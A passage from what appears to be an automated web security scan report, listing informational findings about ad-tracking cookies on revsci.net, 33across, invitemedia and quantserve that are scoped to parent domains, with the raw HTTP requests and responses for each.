Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc2dfb1&0&&4d9d35c9&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc2dfbd&0&&4d9d2f40&00f8712b16a2747053422af6cef97d9a; rtc_33wk=MLuBO6+ht4kWQAcYCwq3qvGtUKGrBZ8doDP9+JcCeOOzqVD+we0MdrEy1Q9wVOPnx3+D9JMtHr3sXfzNw3d1fHSsgQ0j1PMA3u0A65h1Zdx44dhHS5+AaIPoFOSkJCsUdawtp/+wPz4ovCW6/jlMSWl5gugGYoVzCFcXDgXPFV44jOFQ9OvWXmsv0TUYz+5nkUCtLLzUzXTh7M+zWyh9Os1EVo5VMh5rHTjjZnK71873pcHYYzezCHZTM/2+0SL4Kjk8dPShfwkCSnJWFkNsK0MzXgFnrllh6u548CifcAFwE1rm2D91a3IypBzg; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc2dfda&0&&4d9c03eb&00f8712b16a2747053422af6cef97d9a; udm_0=MLv39SEJaSpn5l6paNmEREzM5uAjEsBEbZba7uQQIHoALYGisPLsFHhBzkvhsvoTAE9Wvh6ZCxNEguR8S2rPkq36I/Y42ALDUOFLsElUcIPk9fKtZgFPAifF96YUyd0oLw0n0Ryt05wdrN868QJ/+5QhhVDeoAuh30DL1Nhh9Cj6Z6bFYRSzXtL17j6Azv6OJ7vZk+tBc1rGGFfHZ8KvQqVAuPohuFqyL9DCTu4N0Gi+vRwD/rSPuL1I9buZQs2FTpssoPA2lbNTF5HywZMTMvEJzT0Zf2UCkxkv4eFl2m+vJ05v7cxXSZCytfEePc3AVcKePos/B6yGLnOnYNZSbct435ntIpmH+aMoQIO1EEBT/KbMs4hz185mDkHl9ZhQ39ljvZDokrGoTU36gJfTJZI/AqWc0s0Xmbv+pE9pw7ldj41i8wbXyTCypJvRY2Q6QpW/VxvJxSNMtuSsgJLL78oDV0r4PR7nI83zsUuOS3RTLGmoD3dqyR4OH4CVdFAjOC5c1c5gtOr1VVOjgkORQRxylxYzirxZwMyP6/DKD8ngoLSc1GRKtnJzMc/bI0l4AEBF/cQi4iDXo+iRxGlBQS15VZXhxq88Nq17eHWw9sEvQd1KJzj3TkOH5xiza3lfPjV8/CHorrK/+Knobbr3hxTR+CDzj6HH90GGT11M9it+1+QA5nWCEArmpXBdmF6CsdzcoC8OR+A2ZnIOw21PFvMOjPJ0Xl4ibJjWNuZLTuB1pifXet2MrhoPp1+fInzsdxtGeHmDvcCDU5EzIBOGhIw1ek72Dd+mmWJa7p78Egukc2SG4u/GfEFrBJvicafxIMcv0rhZ8jG4whpHITo1dongFFkobD4S8XLrx2FfETkMJiYku6qW2LdkVjWOWQhvIn8h6J78k9hHbKJ/8ZAg0J7tKUKeAUHjqFcYAEZH0H9DcwWmXwEcnQEbhb9TCWm/0ppaG1RDf1n+fu24/+jM7KvN/z7/7q0u56jH+YrYa3a+P1ge47W+os0pZiaDQpJH0htz1ZJ9klEG2dBtkl1cI3R0VAnabjV6XDJT9jTTZOg12FcQncz8373PU7Ej0JkBaKIJAHku50JX6LtJ/FgCiFkaBBhVLHZvlusvhSNrYDJHBvuC8L8qGa82X1lUTBV7rlrFEvpcBgBGilPpJasi; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; rsi_segs_1000000=pUPNOUOl7wMQVo3BeRs7jC2QUfqNmZ2gYuIADaDQt5G0OSvqZp+ukKFjTv3oN27/yGm8+cN3Kz+epgl9TMpcdZEJG7zn2zEGFOmzupBquqGoXybH0TX8GMUM6DtSO+88cxB/fMQ42H2XbCk6vCmvZgxWriPKYDBzQtIhVLb4FWC2F/o19JXw51AzOQ85qtmk2CcAQWzyh5w3YtYp2bysXMTwtAY4id34udr0ugZ7jpUlRTH3CVtTEu18sZo=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_33wk=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFOUOFKAIUV7mdodOedAQb3oMEVFUwQvflEHBbS0BEV+W2DdLCvt5j0vEjmwU6sZuBk2yeXWUDCC0RAc67aEfjs+D6+e23oOVqgagtOoGY11InYdvurs7m7ctN3jo8p82IYgsx46p3H3YQvOHvwQPDGXR/Ved4X4k/unRGu8RIKK47fIdqZFbeUIDClowwWWmi9lM6PDViH8X3SrL+3XikNBxpEwGud74EEuUNjzR3IOcCw+4RMu3Uo0EgrdFr4Ma9kA==; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:31:36 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; Domain=.revsci.net; Expires=Sat, 07-May-2011 12:31:36 GMT; Path=/
Set-Cookie: udm_0=MLv39SEJaSpn5l6paFGF4PE3PRxA2jF7YYC1PcJb22pwwouGCTcavWRp5gDOVMIHzRWjEwivKG4y8bEh5C5wLlcCwDPbMqRj2DXkTGhDQ89mbFozYsJjVTEuEe/h536ulQSV9ZLPlq3zvY5wI7GSTD5BVaK5PSi5iO04v1pj7PDeGv3V9gM7ANffp4aB2AM/h4hv+T5HgJbAtgb7HqevDR626jrhmXkk69RBMAXp1DdSPYAPQJHJvn/rzZsMfoFkbubkYHmjVEVLasemhsTEo1Serlxmbl0IVn7AefJE4seiDicdI2wontu9IZLwVXc02bCqrYwtitQsQNji6bUMTo/0rT2RSfwdDGJa7xU+fFcroN7218oqxT9x7L35X5DfVBaDrfv29icbjnSxpOmzgnRCNJmalrXQiknC6CGG5dH7zlYBBxkva9nw22SQmXdD/88SrbpYrpKf+UKKtKwts/IjOB6Eazt2PobI4tp2kA5KVtcoWhxRPIHmFCOBaTtO1X2GbaZEI8S14df58UYAZy0ZN5YWWI+O3XTTnts/cczEz7N38q1uFXosRoM5IgYSR04JtFLNDfl6qTI/rRuBVZdxRsDurKPAe1hfxGdmi43q8kUTMdL/6iojPW8Bpg1leE5rV9I+r1+ddGv5HLF1pTh3a+c58Cju7a0VXEHncV9/jXQM/WWwB3k1nJ2JDj9LnMNfD3topntubRGUl2IHm/cuf4Pmw6IoBenU93ZANgR8RJmAS9jO3pq6W15G8DajMvT2Me5/680mvSKsbn8Ovx2R1L4UTH6Km0BSQD2a0DdQOlZLvCu6QyaEfjRkLzHqiwqSJq4cGLPTom4fK3zWi7uWVgSjuYevdiogpfoKxnEMYxVDqJSS06gQ3rnQQxFCYVdSRj2Y9kY+SYa7XCqnZrKPGeBwqT0TlcOMQ0TSbcFBKbc3OQaYo4/OTIjOJKFQ9uSW7SYRUSMKG538HQcbyYKwIxW6hAYLW9Q1y9MJ/g328nZvUZ7bZMGBwpxqeVab0uTo3M5eA37y1R62xsVIrL3T8Y3jsAk6da8WuMg8qhQM77GcgsxMV8+8QbHPrn7mYnL5YvFO6V+LFGqyfa3btS08ujZPpHweBvJ8FjgxIVDr32Hjid6G; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:31:36 GMT; Path=/
Set-Cookie: rtc_qGsx=MLsvrFUucT5jJQFEjn4UCLtfKi1bT6XJF/Ke3QlsQpoZ1X9kRiPoMT0vPHni220BuefN4+w0QDxcRXN24I0Asr7xgdACqrHB0m67F9qXTgct2EN+vx1Kz2qgrSXHJMcW31u9PbAu1Q0puOakzdXHZVUaqKXKpvaRcVcKiXSTA7DL6lqA31DNueTJfahrhz8tvgH9JKtB0RUqAk7TLicfK1WfGaaOsREpwP9lBTpjNapbBi9c69Suxn4OypmFarcp5fNRqAbKRPRF8eHRNT4vvWr+PoZv2GyTjicCIP3umhIkB+xOAXxZrvclHRkbDsIsnwSNEAybZ0fF2IDRSpjtr3pDJ+ihxQDXHAbdwm6LbyN6IoNJ003+6/nA; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:31:36 GMT; Path=/
X-Proc-ms: 24
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:31:36 GMT
Content-Length: 293

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs = ['E05511_10004','D08734_70006','D08734_72076','D08734_72077','D08734_72082'];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvail
...[SNIP]...
5.121. http://pix04.revsci.net/E05511/b3/0/3/0902121/918432446.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05511/b3/0/3/0902121/918432446.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05511/b3/0/3/0902121/918432446.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fstory.asp%253FS%253D14408230%2526affname%253DWCAX%2526adtag%253DNews%2526conttype%253DS%2526baseurl%253Dwww.wcax.com%26DM_REF%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fstory.asp%253FS%253D465801%26DM_EOM%3D1&C=E05511 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=14408230
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; udm_0=MLv39SEJaSpn5l6paFGF4PE3PRxA2jF7YYC1PcJb22pwwouGCTcavWRp5gDOVMIHzRWjEwivKG4y8bEh5C5wLlcCwDPbMqRj2DXkTGhDQ89mbFozYsJjVTEuEe/h536ulQSV9ZLPlq3zvY5wI7GSTD5BVaK5PSi5iO04v1pj7PDeGv3V9gM7ANffp4aB2AM/h4hv+T5HgJbAtgb7HqevDR626jrhmXkk69RBMAXp1DdSPYAPQJHJvn/rzZsMfoFkbubkYHmjVEVLasemhsTEo1Serlxmbl0IVn7AefJE4seiDicdI2wontu9IZLwVXc02bCqrYwtitQsQNji6bUMTo/0rT2RSfwdDGJa7xU+fFcroN7218oqxT9x7L35X5DfVBaDrfv29icbjnSxpOmzgnRCNJmalrXQiknC6CGG5dH7zlYBBxkva9nw22SQmXdD/88SrbpYrpKf+UKKtKwts/IjOB6Eazt2PobI4tp2kA5KVtcoWhxRPIHmFCOBaTtO1X2GbaZEI8S14df58UYAZy0ZN5YWWI+O3XTTnts/cczEz7N38q1uFXosRoM5IgYSR04JtFLNDfl6qTI/rRuBVZdxRsDurKPAe1hfxGdmi43q8kUTMdL/6iojPW8Bpg1leE5rV9I+r1+ddGv5HLF1pTh3a+c58Cju7a0VXEHncV9/jXQM/WWwB3k1nJ2JDj9LnMNfD3topntubRGUl2IHm/cuf4Pmw6IoBenU93ZANgR8RJmAS9jO3pq6W15G8DajMvT2Me5/680mvSKsbn8Ovx2R1L4UTH6Km0BSQD2a0DdQOlZLvCu6QyaEfjRkLzHqiwqSJq4cGLPTom4fK3zWi7uWVgSjuYevdiogpfoKxnEMYxVDqJSS06gQ3rnQQxFCYVdSRj2Y9kY+SYa7XCqnZrKPGeBwqT0TlcOMQ0TSbcFBKbc3OQaYo4/OTIjOJKFQ9uSW7SYRUSMKG538HQcbyYKwIxW6hAYLW9Q1y9MJ/g328nZvUZ7bZMGBwpxqeVab0uTo3M5eA37y1R62xsVIrL3T8Y3jsAk6da8WuMg8qhQM77GcgsxMV8+8QbHPrn7mYnL5YvFO6V+LFGqyfa3btS08ujZPpHweBvJ8FjgxIVDr32Hjid6G; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; rtc_YHkz=MLsv8SUucA5nprADwxMUT9S30MEszwLosfaz5fWZ65hV2fUOBnLo+BWjQ4EZHeotOXo28EHvDL1pbNNARLmM/MYdyRgTqxD/lMxcrQFepPr9SkW1eU9LpSn2xzgwRP18/xx5kJplxqdZg0K0i0fqu/J/OZ9TCWtEp+fzuXuRG+FbCpZ1lOmeCoTp4pvl426xqmAFAWY4P51r/3fAwOzCWO5FcV4p1IrmF2CVroSvndkRCrxSEgB3YRuQwSAQiH132nljo3cuPvcqTkJH7pqq+HZ+yu4LbbP1Wws8UaQ//AvRqu0LQKkkR7aSBTL/fY/adAXHS4sVvNFsz2sFWsy5E+9lTHca29T2ckra1UWkj/ZVjlkwAfbv1rIjcWXvGBjkFTLYIeSAmiAAOsEhNg/HOoGcoZuIH37rGNoaFz8F4rx7j8fqSWaE+E5rI3yMJpNn0B20F8yoQz7E4kPhGO4G5iCUfwVoCLJLxkKPdlyOZqGapSs=; rsi_segs_1000000=pUPFJ0OBbwIMV594t637EICbRK61AlFcyDKEJCWvRS7OL28cRLpo4rpo7XVNzj9gP1CiHgVo5mSsLobwXfhabTWqws1LtFVOOmtg+DZPGqPoDRbjefGo4DSBh5W5mCATwNqLrrq2mE2GjQMBwMuv4EPDDBam1uOkR40BDnTL/sDBt9WuC5bXzUW/ndpHqipDlH7OsFGV35g2HWka6+yarGWSFmohtSsOzftqnJhxH9yncihZ1EZuA0c3fXK11GeN0/nGmU96bdPVmqpplUJ0XEbM6A+xav/MLMHCb2Q6szUn1s3x2QJpsvJOIM5S9is=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_YHkz=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0OBKHIMVp94t/QnbUw36xTQY7LDbTABFXxvXNWqLifxp5y+URSIooUUZKyvzimWvstALXhlEmWx+zWRJ7JnGfOpf0Ud/9xHuDtILCncfzqXUSnG/Cy3tsi7pMKrY9q7DERCZ0T3/lunM2xMQBSBJVEUN1eGGkclWu3zVqYKu5lIFd5ScUAJfDtN2TRJpWBZilVKmbMngJiNBfaWDNpEIlfZPSGQQvDPOlnJ+nGH99lb2Bk3H20qgR4dL5WAyViP4j156jYt9UDiCWHOq3FM/wRcoCReVqgVLsKJewTJtW8TfeREavDRJyXsDARApw==; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:59:28 GMT; Path=/
Set-Cookie: rtc_ntuX=MLsv7iUucA5nprADwxMU7dS30MEszwLosfaz5fWZ65hV2fUOBnLo+BWjQ4EZHeotOXo28EHvDL1pbOBARLmM/MYd6RgTq9u+iM7/hQBepPrdSk21eU9Lpyn2tzgwRP0c/xxljHTX7BOLqY4BgQC03lRGEmvvtSk5ED4IMDjv8yVDLIK7pDAruXGuNrqWcYC2y8NTEmqwp1W1r3QCTBMPKlKt8h8jhogkQYAEg5VB8arCKp0tKwd34RoQt9pfCo91MbMw2aFSr6asrqy72fdH+/zLkZMRMy3ciFEOFuAAUeQuwVGfb3k3GVzU53rLUI0DvmM+6V5MRX1CqiXP3mwBN1MQ8mPvGr+qM8YE4h9IgMnmrTH8vdwVzzmKxdAFML67Dft3ETWNo373nILFCOSd1vgwNYXcTuHTqYEl4k5deAJ/QaLuaTNFARLE0GJGZm144sbAffZWpSi/OK979TxuQBnYIYB1WHNnx7GJBucarx4=; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:59:28 GMT; Path=/
X-Proc-ms: 25
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:59:27 GMT
Content-Length: 653

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs = ['E05511_10410','E05511_10412','E05511_10033','E05511_10034','E05511_10004','D08734_70006','D08734_70043','D08734_70072','E05511_10424'
...[SNIP]...
5.122. http://pixel.33across.com/ps/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /ps/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ps/?pid=454&uid=4d97b40ad252fd37 HTTP/1.1
Host: pixel.33across.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh38.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 33x_ps=u%3D7284381257%3As1%3D1301791557192%3Ats%3D1301791557192

Response

HTTP/1.1 200 OK
P3P: CP='NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA'
Set-Cookie: 33x_ps=u%3D7284381257%3As1%3D1301791557192%3Ats%3D1301791557192; Domain=.33across.com; Expires=Sun, 08-Apr-2012 00:18:15 GMT; Path=/
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01-Jan-70 00:00:01 GMT
X-33X-Status: 0
Content-Type: image/gif
Content-Length: 43
Date: Sat, 09 Apr 2011 00:18:14 GMT
Connection: close
Server: 33XG5

GIF89a.............!...
...,...........L..;
5.123. http://pixel.invitemedia.com/adnxs_sync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /adnxs_sync

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adnxs_sync?uid=8663496762294337265 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exchange_uid="eyI0IjpbIkNBRVNFS09ONkpueXZ2TWVsby1xbklGLTVmVSIsNzM0MjI5XX0="; partnerUID="eyI3OSI6IFsiNmNmN2Q2MjlkMzc5MWVlNjRhY2IyNzFkMGJiMTJkMzEiLCB0cnVlXX0="; segments_p1="eJzjYuZoiuBi4Xg8gZGLmeMkB5C5/gOIuRHEfLyWCcj8xwEk/vsAAMt1Cgc="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 09 Apr 2011 12:31:09 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Sat, 09-Apr-2011 12:30:49 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: exchange_uid=eyIyIjogWyI4NjYzNDk2NzYyMjk0MzM3MjY1IiwgNzM0MjM2XSwgIjQiOiBbIkNBRVNFS09ONkpueXZ2TWVsby1xbklGLTVmVSIsIDczNDIyOV19; Domain=invitemedia.com; expires=Sun, 08-Apr-2012 12:31:09 GMT; Path=/
Set-Cookie: uid=1c9ca161-bef8-4e06-8402-12a87b649832; Domain=invitemedia.com; expires=Mon, 08-Apr-2013 12:31:09 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;
5.124. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=356791091;fpan=1;fpa=P0-2064108896-1302352190176;ns=0;url=http%3A%2F%2Fwww.wptz.com%2Findex.html;ref=;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1302352190175;tzo=300;a=p-41jrVeSPpekVU;labels=Hearst-Argyle%20Television%20Stations HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4d97afca-0a617-aba48-7e2e2; d=EOIBIwG6BoFQCfgkmVAAAKpQzJMFAA

Response

HTTP/1.1 204 No Content
Connection: close
Set-Cookie: d=EFUBJAG8BoGRAJ-CSZUAAAqlDMkwUA; expires=Fri, 08-Jul-2011 12:29:56 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Date: Sat, 09 Apr 2011 12:29:56 GMT
Server: QS

5.125. http://pixel.quantserve.com/pixel/p-61YFdB4e9hBRs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-61YFdB4e9hBRs.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-61YFdB4e9hBRs.gif?labels=3%2e11%2e18%2e300x250&media=apl&idmatch=0 HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?t=1302539475030&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4d97afca-0a617-aba48-7e2e2; d=EDkBZQG-BoHRAJ-CTrGhrTkRCoRvkwAP8Uy4EwC6gQzxQwMCAQULENkwMDCGCBAQQHDOgz21AA

Response

HTTP/1.1 302 Found
Connection: close
Location: http://tag.admeld.com/match?admeld_adprovider_id=247&external_user_id=9uTrnaPmscvvsLOc87f_y6Dh5pLvt7eYp7LzEu2K
Set-Cookie: d=EBUBawG-BoHRAJrR4fw5HrGhrTkRCoRvkwAP8Uy4EwC6gQzxQwMCAQULENkwMDCGCBAQQHDOgz21AA; expires=Sun, 10-Jul-2011 16:31:19 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Mon, 11 Apr 2011 16:31:19 GMT
Server: QS

5.126. http://pixel.quantserve.com/pixel/p-86ZJnSph3DaTI.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-86ZJnSph3DaTI.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-86ZJnSph3DaTI.gif HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4d97afca-0a617-aba48-7e2e2; d=EDkBOgG-BoHRAJ-CSZUBCoRvkwAP8Uy4EwC6gQ_fMNtQ

Response

HTTP/1.1 302 Found
Connection: close
Location: http://ad.yieldmanager.com/pixel?id=1056957&id=1057011&id=665695&id=1056959&id=744662&id=668997&id=744652&id=744660&t=2
Set-Cookie: d=EDQBVgG-BoHRAJ-CTrGhrTkRCoRvkwAP8Uy4EwC6gQyCQgcLENkwmBDhDOgz21A; expires=Sun, 10-Jul-2011 16:21:24 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
